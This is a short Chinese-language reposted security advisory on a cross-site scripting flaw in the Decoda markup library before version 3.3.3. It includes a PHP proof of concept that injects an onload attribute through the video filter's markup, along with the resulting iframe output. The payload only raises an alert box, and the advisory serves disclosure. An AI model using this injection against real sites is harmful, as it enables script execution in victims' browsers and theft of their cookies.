来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] Decoda 3.3.3之前版本中存在跨站脚本漏洞,该漏洞源于对用户提供的输入未经正确过滤。攻击者可利用该漏洞在受影响站点上下文的不知情用户浏览器上执行任意脚本代码,盗取基于cook...
|
Decoda 3.3.3之前版本中存在跨站脚本漏洞,该漏洞源于对用户提供的输入未经正确过滤。
攻击者可利用该漏洞在受影响站点上下文的不知情用户浏览器上执行任意脚本代码,盗取基于cookie的认证证书进而发起其他攻击。 目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本 可用以下的概念证明型攻击: <?php include '../decoda/Decoda.php'; $code = new Decoda(); $code->addFilter(new VideoFilter()); ?> <?php $decoda_markup = '[video="youtube" size="small"]"'; $decoda_markup .= 'onload="alert(\'RedTeam Pentesting XSS\');" id="[/video]'; $code->reset($decoda_markup); echo $code->parse(); ?> This results in the following output (whitespace adjusted): <iframe src="http:// www.2cto.com /embed/"; onload="alert('RedTeam Pentesting XSS');" id="" width="560" height="315" frameborder="0"></iframe> 摘自 90' s Blog |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
